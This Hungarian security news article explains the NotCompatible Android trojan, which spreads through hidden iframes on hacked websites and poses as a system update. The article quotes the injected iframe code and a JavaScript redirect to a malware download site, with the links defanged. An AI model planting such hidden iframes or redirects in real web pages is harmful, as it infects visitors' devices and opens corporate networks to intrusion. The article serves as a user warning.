Feltört weboldalakra látogatva nemcsak számítógépünk, de okostelefonunk is megfertőződhet különböző kártevőkkel.
Szerencsére a veszély elhárítása nem túl nehéz, szokás szerint a józan eszünkre kell hallgatni, és betartani az unalomig ismert szabályokat.
A PC-s világban egyáltalán nem szokatlan, hogy a kártevőket feltört, vagy már direkt így készített weboldalak segítségével terjesztik. A gyanútlan felhasználó ellátogat az adott helyre, és megfelelő biztonsági szoftver hiányában már gépére is kerül a program, ami aztán zombivá változtatja rendszerét, ellopja személyes adatait, pénzét, és így tovább.
Ma viszont már nemcsak a PC-n, hanem az okostelefonokon érkező látogatót is egyre nagyobb veszélynek vannak kitéve. A nemrég felfedezett NotCompatible nevű trójai az első, ami ilyen drive-by-download módszerrel támadja az androidos mobilokat. A fertőzött oldalon egy rejtett iframe segítségével indítják el a letöltést, az alkalmazást viszont már a felhasználónak kell telepítenie. Ebben a bűnözők természetesen az ő felkészületlenségükre, gyanútlanságukra alapozzák várakozásaikat, a letöltött programot ugyanis rendszerfrissítésként próbálják beállítani.
Nem árt tudni, hogy az Androidhoz ilyen frissítést sosem fogunk ismeretlen weboldalakon keresztül megkapni. Ahhoz, hogy a telepítés sikerüljön, engedélyezni kell az alapból letiltott Ismeretlen források menüpontot az Android Beállítások / Alkalmazások menüjében.
A fertőzött weboldal alján általában a következő kódot találhatjuk meg:
<iframe
style=”visibility: hidden; display: none; display: none;”
src=”hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}”></iframe>
Amennyiben a gaoanalitics.info oldalra egy PC-s böngészővel látogatunk el, Not Found hibaüzenetet kapunk, ha viszont a böngésző Androidként jelentkezik be, a következő szöveget kapjuk vissza:
<html><head></head><body><script type=”text/javascript”>window.top.location.href = “hxxp://androidonlinefix.info/fix1.php”;</script></body></html>
Ennek hatására indul a trójai letöltése.
A trójait a gaoanalitics.info és az androidonlinefix.info oldalakról kerül telefonunkra, míg a notcompatibleapp.eu egyfajta irányítóközpont szerepét tölti be.
A NotCompatible maga egy egyszerű TCP/IP proxy, ami nem is annyira a telefont veszélyezteti, mint inkább azokat a hálózatokat, amikhez a készülék csatlakozik, rajta keresztül ugyanis be lehet lépni a védett céges rendszerekbe is.
Forrás: The Official Logout Blog.